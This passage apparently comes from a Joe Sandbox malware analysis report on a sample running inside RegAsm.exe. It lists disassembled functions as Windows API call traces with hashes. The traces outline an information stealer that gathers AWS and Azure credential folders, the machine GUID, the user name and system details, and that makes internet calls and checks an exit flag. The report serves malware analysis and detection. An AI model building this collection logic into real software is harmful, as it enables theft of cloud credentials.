                                                                                    • CreateDirectoryA.KERNEL32(00000000,00000000,00000000,?,5A&6A,?,00426563,00000000,?,00000040,00000064,0041366A,00412D12,?,0000002C,00000064), ref: 00416B55
                                                                                      • Part of subcall function 004010B1: _EH_prolog.MSVCRT ref: 004010B6
                                                                                      • Part of subcall function 0041390C: _EH_prolog.MSVCRT ref: 00413911
                                                                                      • Part of subcall function 0041390C: StrCmpCA.SHLWAPI(00000000,ERROR), ref: 00413B5E
                                                                                      • Part of subcall function 00413295: _EH_prolog.MSVCRT ref: 0041329A
                                                                                      • Part of subcall function 0040F95A: lstrcpy.KERNEL32(00000000,okA), ref: 0040F980
                                                                                    • InternetOpenA.WININET(00000000,00000001,00000000,00000000,00000000), ref: 00416C3A
                                                                                    • InternetOpenA.WININET(00000000,00000001,00000000,00000000,00000000), ref: 00416C56
                                                                                      • Part of subcall function 004104DD: _EH_prolog.MSVCRT ref: 004104E2
                                                                                      • Part of subcall function 004104DD: GetWindowsDirectoryA.KERNEL32(?,00000104,00000001,?,00000000), ref: 00410505
                                                                                      • Part of subcall function 004104DD: GetVolumeInformationA.KERNEL32(?,00000000,00000000,?,00000000,00000000,00000000,00000000,?,00000000), ref: 00410537
                                                                                      • Part of subcall function 004104DD: GetProcessHeap.KERNEL32(00000000,00000104,?,?,00000000), ref: 0041057A
                                                                                      • Part of subcall function 004104DD: HeapAlloc.KERNEL32(00000000,?,?,00000000), ref: 00410581
                                                                                      • Part of subcall function 00403AF5: _EH_prolog.MSVCRT ref: 00403AFA
                                                                                      • Part of subcall function 00403AF5: InternetOpenA.WININET(00000000,00000001,00000000,00000000,00000000), ref: 00403BA5
                                                                                      • Part of subcall function 00403AF5: StrCmpCA.SHLWAPI(?), ref: 00403BBC
                                                                                      • Part of subcall function 00411CD8: _EH_prolog.MSVCRT ref: 00411CDD
                                                                                      • Part of subcall function 00411CD8: StrCmpCA.SHLWAPI(00000000,block,00000000,?,?,00416CD7), ref: 00411CFF
                                                                                      • Part of subcall function 00411CD8: ExitProcess.KERNEL32 ref: 00411D0A
                                                                                      • Part of subcall function 0040ED08: _EH_prolog.MSVCRT ref: 0040ED0D
                                                                                      • Part of subcall function 0040ED08: StrCmpCA.SHLWAPI(00000000,?,?,00000000), ref: 0040ED51
                                                                                      • Part of subcall function 0040ED08: StrCmpCA.SHLWAPI(00000000,?,?,00000000), ref: 0040EDC5
                                                                                      • Part of subcall function 0040514C: _EH_prolog.MSVCRT ref: 00405151
                                                                                      • Part of subcall function 0040514C: InternetOpenA.WININET(00000000,00000001,00000000,00000000,00000000), ref: 004051FC
                                                                                      • Part of subcall function 0040514C: StrCmpCA.SHLWAPI(?), ref: 00405213
                                                                                      • Part of subcall function 004117C4: _EH_prolog.MSVCRT ref: 004117C9
                                                                                      • Part of subcall function 004117C4: strtok_s.MSVCRT ref: 004117F0
                                                                                      • Part of subcall function 004117C4: StrCmpCA.SHLWAPI(00000000,00426518,?,?,?,?,00416EC0), ref: 00411821
                                                                                      • Part of subcall function 004117C4: strtok_s.MSVCRT ref: 00411882
                                                                                      • Part of subcall function 00401ED6: _EH_prolog.MSVCRT ref: 00401EDB
                                                                                      • Part of subcall function 004165D9: _EH_prolog.MSVCRT ref: 004165DE
                                                                                      • Part of subcall function 004165D9: lstrcat.KERNEL32(?,00000000), ref: 00416620
                                                                                      • Part of subcall function 004165D9: lstrcat.KERNEL32(?), ref: 0041663F
                                                                                      • Part of subcall function 00416791: _EH_prolog.MSVCRT ref: 00416796
                                                                                      • Part of subcall function 00416791: memset.MSVCRT ref: 004167B6
                                                                                      • Part of subcall function 00416791: lstrcat.KERNEL32(?,00000000), ref: 004167DC
                                                                                      • Part of subcall function 00416791: lstrcat.KERNEL32(?,\.azure\), ref: 004167F9
                                                                                      • Part of subcall function 00416791: memset.MSVCRT ref: 00416834
                                                                                      • Part of subcall function 00416791: lstrcat.KERNEL32(?,00000000), ref: 0041685F
                                                                                      • Part of subcall function 00416791: lstrcat.KERNEL32(?,\.aws\), ref: 0041687C
                                                                                      • Part of subcall function 00416791: memset.MSVCRT ref: 004168B7
                                                                                      • Part of subcall function 00401061: _EH_prolog.MSVCRT ref: 00401066
                                                                                    Strings
                                                                                    Memory Dump Source
                                                                                    • Source File: 00000001.00000002.2525936696.0000000000400000.00000040.00000400.00020000.00000000.sdmp, Offset: 00400000, based on PE: true
                                                                                    • Associated: 00000001.00000002.2525936696.0000000000434000.00000040.00000400.00020000.00000000.sdmpDownload File
                                                                                    • Associated: 00000001.00000002.2525936696.0000000000438000.00000040.00000400.00020000.00000000.sdmpDownload File
                                                                                    • Associated: 00000001.00000002.2525936696.000000000043C000.00000040.00000400.00020000.00000000.sdmpDownload File
                                                                                    • Associated: 00000001.00000002.2525936696.000000000052B000.00000040.00000400.00020000.00000000.sdmpDownload File
                                                                                    • Associated: 00000001.00000002.2525936696.000000000052E000.00000040.00000400.00020000.00000000.sdmpDownload File
                                                                                    • Associated: 00000001.00000002.2525936696.0000000000534000.00000040.00000400.00020000.00000000.sdmpDownload File
                                                                                    • Associated: 00000001.00000002.2525936696.0000000000553000.00000040.00000400.00020000.00000000.sdmpDownload File
                                                                                    • Associated: 00000001.00000002.2525936696.0000000000572000.00000040.00000400.00020000.00000000.sdmpDownload File
                                                                                    • Associated: 00000001.00000002.2525936696.000000000060B000.00000040.00000400.00020000.00000000.sdmpDownload File
                                                                                    • Associated: 00000001.00000002.2525936696.000000000063F000.00000040.00000400.00020000.00000000.sdmpDownload File
                                                                                    Joe Sandbox IDA Plugin
                                                                                    • Snapshot File: hcaresult_1_2_400000_RegAsm.jbxd
                                                                                    Yara matches
                                                                                    Similarity
                                                                                    • API ID: AddressProc$H_prolog$lstrcat$lstrcpy$InternetOpen$memset$DirectoryHeapProcesslstrlenstrtok_s$AllocCreateExitInformationSystemTimeVolumeWindows
                                                                                    • String ID: 5A&6A
                                                                                    • API String ID: 1955031769-2983527881
                                                                                    • Opcode ID: 2ee3f8b9386a6497ed6ebd3ffcc33a71c189eb79d5fdec20d5bed9e4fc6e3802
                                                                                    • Instruction ID: bb05b1d9e7c39d7df88ecf206bceb681005d45f58bf20589137b6770423741ef
                                                                                    • Opcode Fuzzy Hash: 2ee3f8b9386a6497ed6ebd3ffcc33a71c189eb79d5fdec20d5bed9e4fc6e3802
                                                                                    • Instruction Fuzzy Hash: AC4242B1D00358AADF10EBA5CD46BDEBB78AF15304F5041AEF54573281DB781B888BA7
                                                                                    Function 0040618B Relevance: 10.6, APIs: 7, Instructions: 70filememoryCOMMON
                                                                                    Download Yara Rule
                                                                                    APIs
                                                                                    • _EH_prolog.MSVCRT ref: 00406190
                                                                                    • CreateFileA.KERNEL32(00000000,80000000,00000001,00000000,00000003,00000000,00000000,?,?,?,?,?,?,?,00000000), ref: 004061B3
                                                                                    • GetFileSizeEx.KERNEL32(00000000,?,?,?,?,?,?,?,?,00000000), ref: 004061CA
                                                                                    • LocalAlloc.KERNEL32(00000040,?,00000000,00000000,?,?,?,?,?,?,?,00000000), ref: 004061E6
                                                                                    • ReadFile.KERNEL32(?,00000000,?,?,00000000,?,?,?,?,?,?,?,00000000), ref: 00406200
                                                                                    • LocalFree.KERNEL32(?,?,?,?,?,?,?,?,00000000), ref: 00406216
                                                                                    • CloseHandle.KERNEL32(?,?,?,?,?,?,?,?,00000000), ref: 00406221
                                                                                    Memory Dump Source
                                                                                    • Source File: 00000001.00000002.2525936696.0000000000400000.00000040.00000400.00020000.00000000.sdmp, Offset: 00400000, based on PE: true
                                                                                    • Associated: 00000001.00000002.2525936696.0000000000434000.00000040.00000400.00020000.00000000.sdmpDownload File
                                                                                    • Associated: 00000001.00000002.2525936696.0000000000438000.00000040.00000400.00020000.00000000.sdmpDownload File
                                                                                    • Associated: 00000001.00000002.2525936696.000000000043C000.00000040.00000400.00020000.00000000.sdmpDownload File
                                                                                    • Associated: 00000001.00000002.2525936696.000000000052B000.00000040.00000400.00020000.00000000.sdmpDownload File
                                                                                    • Associated: 00000001.00000002.2525936696.000000000052E000.00000040.00000400.00020000.00000000.sdmpDownload File
                                                                                    • Associated: 00000001.00000002.2525936696.0000000000534000.00000040.00000400.00020000.00000000.sdmpDownload File
                                                                                    • Associated: 00000001.00000002.2525936696.0000000000553000.00000040.00000400.00020000.00000000.sdmpDownload File
                                                                                    • Associated: 00000001.00000002.2525936696.0000000000572000.00000040.00000400.00020000.00000000.sdmpDownload File
                                                                                    • Associated: 00000001.00000002.2525936696.000000000060B000.00000040.00000400.00020000.00000000.sdmpDownload File
                                                                                    • Associated: 00000001.00000002.2525936696.000000000063F000.00000040.00000400.00020000.00000000.sdmpDownload File
                                                                                    Joe Sandbox IDA Plugin
                                                                                    • Snapshot File: hcaresult_1_2_400000_RegAsm.jbxd
                                                                                    Yara matches
                                                                                    Similarity
                                                                                    • API ID: File$Local$AllocCloseCreateFreeH_prologHandleReadSize
                                                                                    • String ID:
                                                                                    • API String ID: 3869837436-0
                                                                                    • Opcode ID: 64a3422522f7e7e46d77fb1e68ae032180970e1801099016b3dac20f8dd4ba7d
                                                                                    • Instruction ID: 909566f9f53506b5aa2d8709c9cb46b640c87a2d020782bf56f99dd61eaf9922
                                                                                    • Opcode Fuzzy Hash: 64a3422522f7e7e46d77fb1e68ae032180970e1801099016b3dac20f8dd4ba7d
                                                                                    • Instruction Fuzzy Hash: 6E218B70A00115ABDB20AFA4DC48EAFBBB9FF95710F20056EF952E62D4D7389911CB64
                                                                                    Function 00410415 Relevance: 10.5, APIs: 4, Strings: 2, Instructions: 42registryCOMMON
                                                                                    Download Yara Rule
                                                                                    APIs
                                                                                    • memset.MSVCRT ref: 0041043B
                                                                                    • RegOpenKeyExA.KERNEL32(80000002,SOFTWARE\Microsoft\Cryptography,00000000,00020119,004264F6,?,?,00000000), ref: 00410457
                                                                                    • RegQueryValueExA.KERNEL32(004264F6,MachineGuid,00000000,00000000,?,000000FF,?,?,00000000), ref: 00410476
                                                                                    • CharToOemA.USER32(?,?), ref: 00410493
                                                                                    Strings
                                                                                    Memory Dump Source
                                                                                    • Source File: 00000001.00000002.2525936696.0000000000400000.00000040.00000400.00020000.00000000.sdmp, Offset: 00400000, based on PE: true
                                                                                    • Associated: 00000001.00000002.2525936696.0000000000434000.00000040.00000400.00020000.00000000.sdmpDownload File
                                                                                    • Associated: 00000001.00000002.2525936696.0000000000438000.00000040.00000400.00020000.00000000.sdmpDownload File
                                                                                    • Associated: 00000001.00000002.2525936696.000000000043C000.00000040.00000400.00020000.00000000.sdmpDownload File
                                                                                    • Associated: 00000001.00000002.2525936696.000000000052B000.00000040.00000400.00020000.00000000.sdmpDownload File
                                                                                    • Associated: 00000001.00000002.2525936696.000000000052E000.00000040.00000400.00020000.00000000.sdmpDownload File
                                                                                    • Associated: 00000001.00000002.2525936696.0000000000534000.00000040.00000400.00020000.00000000.sdmpDownload File
                                                                                    • Associated: 00000001.00000002.2525936696.0000000000553000.00000040.00000400.00020000.00000000.sdmpDownload File
                                                                                    • Associated: 00000001.00000002.2525936696.0000000000572000.00000040.00000400.00020000.00000000.sdmpDownload File
                                                                                    • Associated: 00000001.00000002.2525936696.000000000060B000.00000040.00000400.00020000.00000000.sdmpDownload File
                                                                                    • Associated: 00000001.00000002.2525936696.000000000063F000.00000040.00000400.00020000.00000000.sdmpDownload File
                                                                                    Joe Sandbox IDA Plugin
                                                                                    • Snapshot File: hcaresult_1_2_400000_RegAsm.jbxd
                                                                                    Yara matches
                                                                                    Similarity
                                                                                    • API ID: CharOpenQueryValuememset
                                                                                    • String ID: MachineGuid$SOFTWARE\Microsoft\Cryptography
                                                                                    • API String ID: 1728412123-1211650757
                                                                                    • Opcode ID: 690c6a79ccc41db0391f32f940e07a5d4ef8664030ade9d40bd6695f658342bb
                                                                                    • Instruction ID: 59bbf989d6e17c2dbf70e6b3d9441336261c3d0a51168b80e9bc1bfc74bcefc6
                                                                                    • Opcode Fuzzy Hash: 690c6a79ccc41db0391f32f940e07a5d4ef8664030ade9d40bd6695f658342bb
                                                                                    • Instruction Fuzzy Hash: BA014F7590421DFFEB10EB90DC8AFEABB7CEB14704F1000A5B244E2051EAB45EC88B60
                                                                                    Function 0040FF81 Relevance: 10.5, APIs: 4, Strings: 2, Instructions: 38memoryCOMMON
                                                                                    Download Yara Rule
                                                                                    APIs
                                                                                    • GetProcessHeap.KERNEL32(00000000,00000104,00000001,00000000,00000000,?,Windows: ,00000000,?,004265CC,00000000,?,Work Dir: In memory,00000000,?,004265B4), ref: 0040FF8F
                                                                                    • HeapAlloc.KERNEL32(00000000), ref: 0040FF96
                                                                                    • GlobalMemoryStatusEx.KERNEL32 ref: 0040FFB6
                                                                                    • wsprintfA.USER32 ref: 0040FFDC
                                                                                    Strings
                                                                                    Memory Dump Source
                                                                                    • Source File: 00000001.00000002.2525936696.0000000000400000.00000040.00000400.00020000.00000000.sdmp, Offset: 00400000, based on PE: true
                                                                                    • Associated: 00000001.00000002.2525936696.0000000000434000.00000040.00000400.00020000.00000000.sdmpDownload File
                                                                                    • Associated: 00000001.00000002.2525936696.0000000000438000.00000040.00000400.00020000.00000000.sdmpDownload File
                                                                                    • Associated: 00000001.00000002.2525936696.000000000043C000.00000040.00000400.00020000.00000000.sdmpDownload File
                                                                                    • Associated: 00000001.00000002.2525936696.000000000052B000.00000040.00000400.00020000.00000000.sdmpDownload File
                                                                                    • Associated: 00000001.00000002.2525936696.000000000052E000.00000040.00000400.00020000.00000000.sdmpDownload File
                                                                                    • Associated: 00000001.00000002.2525936696.0000000000534000.00000040.00000400.00020000.00000000.sdmpDownload File
                                                                                    • Associated: 00000001.00000002.2525936696.0000000000553000.00000040.00000400.00020000.00000000.sdmpDownload File
                                                                                    • Associated: 00000001.00000002.2525936696.0000000000572000.00000040.00000400.00020000.00000000.sdmpDownload File
                                                                                    • Associated: 00000001.00000002.2525936696.000000000060B000.00000040.00000400.00020000.00000000.sdmpDownload File
                                                                                    • Associated: 00000001.00000002.2525936696.000000000063F000.00000040.00000400.00020000.00000000.sdmpDownload File
                                                                                    Joe Sandbox IDA Plugin
                                                                                    • Snapshot File: hcaresult_1_2_400000_RegAsm.jbxd
                                                                                    Yara matches
                                                                                    Similarity
                                                                                    • API ID: Heap$AllocGlobalMemoryProcessStatuswsprintf
                                                                                    • String ID: %d MB$@
                                                                                    • API String ID: 3644086013-3474575989
                                                                                    • Opcode ID: 4f991f30794ae567231d4426d27710baedccdaada08d1eb6089db446b3004ae7
                                                                                    • Instruction ID: 4fd6b884c886e70f5bea54c710daa34e5fcd35151b99761237641847ab172de6
                                                                                    • Opcode Fuzzy Hash: 4f991f30794ae567231d4426d27710baedccdaada08d1eb6089db446b3004ae7
                                                                                    • Instruction Fuzzy Hash: A5F030B5A40218ABEB149BA4DC4AFBE76BEEB45705F400139F706E62C0DBB8D8058775
                                                                                    Function 00415CA5 Relevance: 9.1, APIs: 6, Instructions: 128registrystringCOMMON
                                                                                    Download Yara Rule
                                                                                    APIs
                                                                                    • _EH_prolog.MSVCRT ref: 00415CAA
                                                                                    • memset.MSVCRT ref: 00415CD6
                                                                                    • RegOpenKeyExA.KERNEL32(80000001,00000000,00020119,?,?,?,00000000), ref: 00415CF3
                                                                                    • RegQueryValueExA.ADVAPI32(?,00000000,00000000,?,000000FF,?,?,00000000), ref: 00415D13
                                                                                    • lstrcat.KERNEL32(?,?), ref: 00415D42
                                                                                    • lstrcat.KERNEL32(?), ref: 00415D55
                                                                                    Memory Dump Source
                                                                                    • Source File: 00000001.00000002.2525936696.0000000000400000.00000040.00000400.00020000.00000000.sdmp, Offset: 00400000, based on PE: true
                                                                                    • Associated: 00000001.00000002.2525936696.0000000000434000.00000040.00000400.00020000.00000000.sdmpDownload File
                                                                                    • Associated: 00000001.00000002.2525936696.0000000000438000.00000040.00000400.00020000.00000000.sdmpDownload File
                                                                                    • Associated: 00000001.00000002.2525936696.000000000043C000.00000040.00000400.00020000.00000000.sdmpDownload File
                                                                                    • Associated: 00000001.00000002.2525936696.000000000052B000.00000040.00000400.00020000.00000000.sdmpDownload File
                                                                                    • Associated: 00000001.00000002.2525936696.000000000052E000.00000040.00000400.00020000.00000000.sdmpDownload File
                                                                                    • Associated: 00000001.00000002.2525936696.0000000000534000.00000040.00000400.00020000.00000000.sdmpDownload File
                                                                                    • Associated: 00000001.00000002.2525936696.0000000000553000.00000040.00000400.00020000.00000000.sdmpDownload File
                                                                                    • Associated: 00000001.00000002.2525936696.0000000000572000.00000040.00000400.00020000.00000000.sdmpDownload File
                                                                                    • Associated: 00000001.00000002.2525936696.000000000060B000.00000040.00000400.00020000.00000000.sdmpDownload File
                                                                                    • Associated: 00000001.00000002.2525936696.000000000063F000.00000040.00000400.00020000.00000000.sdmpDownload File
                                                                                    Joe Sandbox IDA Plugin
                                                                                    • Snapshot File: hcaresult_1_2_400000_RegAsm.jbxd
                                                                                    Yara matches
                                                                                    Similarity
                                                                                    • API ID: lstrcat$H_prologOpenQueryValuememset
                                                                                    • String ID:
                                                                                    • API String ID: 2333602472-0
                                                                                    • Opcode ID: 5908ee0a41c72f3eb61dbe54366e8acb213d08ed70dfc70b307fc866011581ad
                                                                                    • Instruction ID: b1237888a7669b0395c9cdb9a6d9471705cae356a33a5f6a680b3cc5b253afb1
                                                                                    • Opcode Fuzzy Hash: 5908ee0a41c72f3eb61dbe54366e8acb213d08ed70dfc70b307fc866011581ad
                                                                                    • Instruction Fuzzy Hash: 8F419DB1D4021DABCF10EFA0DC86EDD7B7DAF18344F00456AB618A2191E7399A858BD2
                                                                                    Function 00417250 Relevance: 9.1, APIs: 6, Instructions: 65sleepCOMMON
                                                                                    Download Yara Rule
                                                                                    APIs
                                                                                      • Part of subcall function 00417330: LoadLibraryA.KERNEL32(kernel32.dll,00417262), ref: 00417335
                                                                                      • Part of subcall function 00417330: GetProcAddress.KERNEL32 ref: 0041737A
                                                                                      • Part of subcall function 00417330: GetProcAddress.KERNEL32 ref: 00417391
                                                                                      • Part of subcall function 00417330: GetProcAddress.KERNEL32 ref: 004173A8
                                                                                      • Part of subcall function 00417330: GetProcAddress.KERNEL32 ref: 004173BF
                                                                                      • Part of subcall function 00417330: GetProcAddress.KERNEL32 ref: 004173D6
                                                                                      • Part of subcall function 00417330: GetProcAddress.KERNEL32 ref: 004173ED
                                                                                      • Part of subcall function 00417330: GetProcAddress.KERNEL32 ref: 00417404
                                                                                      • Part of subcall function 00417330: GetProcAddress.KERNEL32 ref: 0041741B
                                                                                      • Part of subcall function 00417330: GetProcAddress.KERNEL32 ref: 00417432
                                                                                      • Part of subcall function 00417330: GetProcAddress.KERNEL32 ref: 00417449
                                                                                      • Part of subcall function 00417330: GetProcAddress.KERNEL32 ref: 00417460
                                                                                      • Part of subcall function 00417330: GetProcAddress.KERNEL32 ref: 00417477
                                                                                      • Part of subcall function 00417330: GetProcAddress.KERNEL32 ref: 0041748E
                                                                                      • Part of subcall function 00417330: GetProcAddress.KERNEL32 ref: 004174A5
                                                                                      • Part of subcall function 00417330: GetProcAddress.KERNEL32 ref: 004174BC
                                                                                      • Part of subcall function 00417330: GetProcAddress.KERNEL32 ref: 004174D3
                                                                                      • Part of subcall function 00417330: GetProcAddress.KERNEL32 ref: 004174EA
                                                                                      • Part of subcall function 00417330: GetProcAddress.KERNEL32 ref: 00417501
                                                                                      • Part of subcall function 00417330: GetProcAddress.KERNEL32 ref: 00417518
                                                                                      • Part of subcall function 00417330: GetProcAddress.KERNEL32 ref: 0041752F
                                                                                      • Part of subcall function 00417330: LoadLibraryA.KERNEL32 ref: 00417540
                                                                                      • Part of subcall function 00417330: LoadLibraryA.KERNEL32 ref: 00417551
                                                                                      • Part of subcall function 0040F923: lstrcpy.KERNEL32(00000000,00000000), ref: 0040F94D
                                                                                      • Part of subcall function 0040FBCB: GetProcessHeap.KERNEL32(00000000,00000104,?,?,?,00417274,0042656F), ref: 0040FBD7
                                                                                      • Part of subcall function 0040FBCB: HeapAlloc.KERNEL32(00000000,?,?,?,00417274,0042656F), ref: 0040FBDE
                                                                                      • Part of subcall function 0040FBCB: GetUserNameA.ADVAPI32(00000000,?), ref: 0040FBF2
                                                                                      • Part of subcall function 0040FA9C: _EH_prolog.MSVCRT ref: 0040FAA1
                                                                                      • Part of subcall function 0040FA9C: lstrlenA.KERNEL32(?,?,?,?,?,00417294,?,?,00426AC0,?,00000000,0042656F), ref: 0040FAC9
                                                                                      • Part of subcall function 0040FA9C: lstrcpy.KERNEL32(00000000), ref: 0040FAF0
                                                                                      • Part of subcall function 0040FA9C: lstrcat.KERNEL32(?,?), ref: 0040FAFB
                                                                                      • Part of subcall function 0040F9E1: lstrcpy.KERNEL32(00000000,?), ref: 0040FA1A
                                                                                    • CloseHandle.KERNEL32(00000000), ref: 004172D5
                                                                                    • Sleep.KERNEL32(00001B58), ref: 004172E0
                                                                                    • OpenEventA.KERNEL32(001F0003,00000000,00000000,00000000,?,?,00426AC0,?,00000000,0042656F), ref: 004172F1
                                                                                    • CreateEventA.KERNEL32(00000000,00000000,00000000,00000000), ref: 00417307
                                                                                    • CloseHandle.KERNEL32(00000000), ref: 00417315
                                                                                    • ExitProcess.KERNEL32 ref: 0041731C
                                                                                    Memory Dump Source
                                                                                    • Source File: 00000001.00000002.2525936696.0000000000400000.00000040.00000400.00020000.00000000.sdmp, Offset: 00400000, based on PE: true
                                                                                    • Associated: 00000001.00000002.2525936696.0000000000434000.00000040.00000400.00020000.00000000.sdmpDownload File
                                                                                    • Associated: 00000001.00000002.2525936696.0000000000438000.00000040.00000400.00020000.00000000.sdmpDownload File
                                                                                    • Associated: 00000001.00000002.2525936696.000000000043C000.00000040.00000400.00020000.00000000.sdmpDownload File
                                                                                    • Associated: 00000001.00000002.2525936696.000000000052B000.00000040.00000400.00020000.00000000.sdmpDownload File
                                                                                    • Associated: 00000001.00000002.2525936696.000000000052E000.00000040.00000400.00020000.00000000.sdmpDownload File
                                                                                    • Associated: 00000001.00000002.2525936696.0000000000534000.00000040.00000400.00020000.00000000.sdmpDownload File
                                                                                    • Associated: 00000001.00000002.2525936696.0000000000553000.00000040.00000400.00020000.00000000.sdmpDownload File
                                                                                    • Associated: 00000001.00000002.2525936696.0000000000572000.00000040.00000400.00020000.00000000.sdmpDownload File
                                                                                    • Associated: 00000001.00000002.2525936696.000000000060B000.00000040.00000400.00020000.00000000.sdmpDownload File
                                                                                    • Associated: 00000001.00000002.2525936696.000000000063F000.00000040.00000400.00020000.00000000.sdmpDownload File
                                                                                    Joe Sandbox IDA Plugin
                                                                                    • Snapshot File: hcaresult_1_2_400000_RegAsm.jbxd
                                                                                    Yara matches
                                                                                    Similarity
                                                                                    • API ID: AddressProc$LibraryLoadlstrcpy$CloseEventHandleHeapProcess$AllocCreateExitH_prologNameOpenSleepUserlstrcatlstrlen
                                                                                    • String ID:
                                                                                    • API String ID: 1043047581-0
                                                                                    • Opcode ID: 63899c68169e41570f029a222e57a0ca82ee8ba73f8e0d272385d8930f0730d7
                                                                                    • Instruction ID: 5fe09bd252f0d150a6d3d00478baf6c0c38f56ac8277075a71d8cdb1780555ff
                                                                                    • Opcode Fuzzy Hash: 63899c68169e41570f029a222e57a0ca82ee8ba73f8e0d272385d8930f0730d7
                                                                                    • Instruction Fuzzy Hash: 45112C71900019BBCB11FBA2DD6ADEEB77DAE55304B50007EB502B24E1DF386A09CA69
                                                                                    Function 00403A54 Relevance: 9.1, APIs: 6, Instructions: 56stringnetworkCOMMON
                                                                                    Download Yara Rule
                                                                                    APIs
                                                                                    • _EH_prolog.MSVCRT ref: 00403A59
                                                                                    • ??_U@YAPAXI@Z.MSVCRT ref: 00403A8B
                                                                                    • ??_U@YAPAXI@Z.MSVCRT ref: 00403A94
                                                                                    • ??_U@YAPAXI@Z.MSVCRT ref: 00403A9D
                                                                                    • lstrlenA.KERNEL32(00000000,00000000,?,?,00000001,000000C8), ref: 00403AB7
                                                                                    • InternetCrackUrlA.WININET(00000000,00000000,?,00000001), ref: 00403AC7
                                                                                    Memory Dump Source
                                                                                    • Source File: 00000001.00000002.2525936696.0000000000400000.00000040.00000400.00020000.00000000.sdmp, Offset: 00400000, based on PE: true
                                                                                    • Associated: 00000001.00000002.2525936696.0000000000434000.00000040.00000400.00020000.00000000.sdmpDownload File
                                                                                    • Associated: 00000001.00000002.2525936696.0000000000438000.00000040.00000400.00020000.00000000.sdmpDownload File
                                                                                    • Associated: 00000001.00000002.2525936696.000000000043C000.00000040.00000400.00020000.00000000.sdmpDownload File
                                                                                    • Associated: 00000001.00000002.2525936696.000000000052B000.00000040.00000400.00020000.00000000.sdmpDownload File
                                                                                    • Associated: 00000001.00000002.2525936696.000000000052E000.00000040.00000400.00020000.00000000.sdmpDownload File
                                                                                    • Associated: 00000001.00000002.2525936696.0000000000534000.00000040.00000400.00020000.00000000.sdmpDownload File
                                                                                    • Associated: 00000001.00000002.2525936696.0000000000553000.00000040.00000400.00020000.00000000.sdmpDownload File
                                                                                    • Associated: 00000001.00000002.2525936696.0000000000572000.00000040.00000400.00020000.00000000.sdmpDownload File
                                                                                    • Associated: 00000001.00000002.2525936696.000000000060B000.00000040.00000400.00020000.00000000.sdmpDownload File
                                                                                    • Associated: 00000001.00000002.2525936696.000000000063F000.00000040.00000400.00020000.00000000.sdmpDownload File
                                                                                    Joe Sandbox IDA Plugin
                                                                                    • Snapshot File: hcaresult_1_2_400000_RegAsm.jbxd
                                                                                    Yara matches
                                                                                    Similarity
                                                                                    • API ID: CrackH_prologInternetlstrlen
                                                                                    • String ID:
                                                                                    • API String ID: 503950642-0
                                                                                    • Opcode ID: 0d221dbbc7c0b090ec087e33715908742fb57a3485d1500de3dc28ba3d66cb29
                                                                                    • Instruction ID: cc07c141d42f95622a17f2cc37de93049e7409e5d01b43fa4466afa553a2edca
                                                                                    • Opcode Fuzzy Hash: 0d221dbbc7c0b090ec087e33715908742fb57a3485d1500de3dc28ba3d66cb29
                                                                                    • Instruction Fuzzy Hash: B4114C71D00208ABCB24AFA5D805BDE7F78AF45325F20422AF921A62D0DB385A498B54
                                                                                    Function 0040B1E0 Relevance: 8.9, APIs: 3, Strings: 2, Instructions: 186stringCOMMON
                                                                                    Download Yara Rule
                                                                                    APIs
                                                                                    • _EH_prolog.MSVCRT ref: 0040B1E5
                                                                                      • Part of subcall function 0040F95A: lstrcpy.KERNEL32(00000000,okA), ref: 0040F980
                                                                                      • Part of subcall function 0040618B: _EH_prolog.MSVCRT ref: 00406190
                                                                                      • Part of subcall function 0040618B: CreateFileA.KERNEL32(00000000,80000000,00000001,00000000,00000003,00000000,00000000,?,?,?,?,?,?,?,00000000), ref: 004061B3
                                                                                      • Part of subcall function 0040618B: GetFileSizeEx.KERNEL32(00000000,?,?,?,?,?,?,?,?,00000000), ref: 004061CA
                                                                                      • Part of subcall function 0040618B: LocalAlloc.KERNEL32(00000040,?,00000000,00000000,?,?,?,?,?,?,?,00000000), ref: 004061E6
                                                                                      • Part of subcall function 0040618B: ReadFile.KERNEL32(?,00000000,?,?,00000000,?,?,?,?,?,?,?,00000000), ref: 00406200
                                                                                      • Part of subcall function 0040618B: CloseHandle.KERNEL32(?,?,?,?,?,?,?,?,00000000), ref: 00406221
                                                                                      • Part of subcall function 00410D6D: LocalAlloc.KERNEL32(00000040,004131CC,000000C8,00000001,?,004131CB,00000000,00000000), ref: 00410D86
                                                                                      • Part of subcall function 0040F923: lstrcpy.KERNEL32(00000000,00000000), ref: 0040F94D
                                                                                      • Part of subcall function 0040FA9C: _EH_prolog.MSVCRT ref: 0040FAA1
                                                                                      • Part of subcall function 0040FA9C: lstrlenA.KERNEL32(?,?,?,?,?,00417294,?,?,00426AC0,?,00000000,0042656F), ref: 0040FAC9
                                                                                      • Part of subcall function 0040FA9C: lstrcpy.KERNEL32(00000000), ref: 0040FAF0
                                                                                      • Part of subcall function 0040FA9C: lstrcat.KERNEL32(?,?), ref: 0040FAFB
                                                                                      • Part of subcall function 0040F9E1: lstrcpy.KERNEL32(00000000,?), ref: 0040FA1A
                                                                                      • Part of subcall function 0040FA28: _EH_prolog.MSVCRT ref: 0040FA2D
                                                                                      • Part of subcall function 0040FA28: lstrcpy.KERNEL32(00000000), ref: 0040FA79
                                                                                      • Part of subcall function 0040FA28: lstrcat.KERNEL32(?,?), ref: 0040FA83
                                                                                    • StrStrA.SHLWAPI(00000000,00000000,00000000,?,?,00000000,?,00425ED8,00425BE3), ref: 0040B2A6
                                                                                    • lstrlenA.KERNEL32(00000000), ref: 0040B2C2
                                                                                      • Part of subcall function 004010B1: _EH_prolog.MSVCRT ref: 004010B6
                                                                                      • Part of subcall function 0040AFAF: _EH_prolog.MSVCRT ref: 0040AFB4
                                                                                    Strings
                                                                                    Memory Dump Source
                                                                                    • Source File: 00000001.00000002.2525936696.0000000000400000.00000040.00000400.00020000.00000000.sdmp, Offset: 00400000, based on PE: true
                                                                                    • Associated: 00000001.00000002.2525936696.0000000000434000.00000040.00000400.00020000.00000000.sdmpDownload File
                                                                                    • Associated: 00000001.00000002.2525936696.0000000000438000.00000040.00000400.00020000.00000000.sdmpDownload File
                                                                                    • Associated: 00000001.00000002.2525936696.000000000043C000.00000040.00000400.00020000.00000000.sdmpDownload File
                                                                                    • Associated: 00000001.00000002.2525936696.000000000052B000.00000040.00000400.00020000.00000000.sdmpDownload File
                                                                                    • Associated: 00000001.00000002.2525936696.000000000052E000.00000040.00000400.00020000.00000000.sdmpDownload File
                                                                                    • Associated: 00000001.00000002.2525936696.0000000000534000.00000040.00000400.00020000.00000000.sdmpDownload File
                                                                                    • Associated: 00000001.00000002.2525936696.0000000000553000.00000040.00000400.00020000.00000000.sdmpDownload File
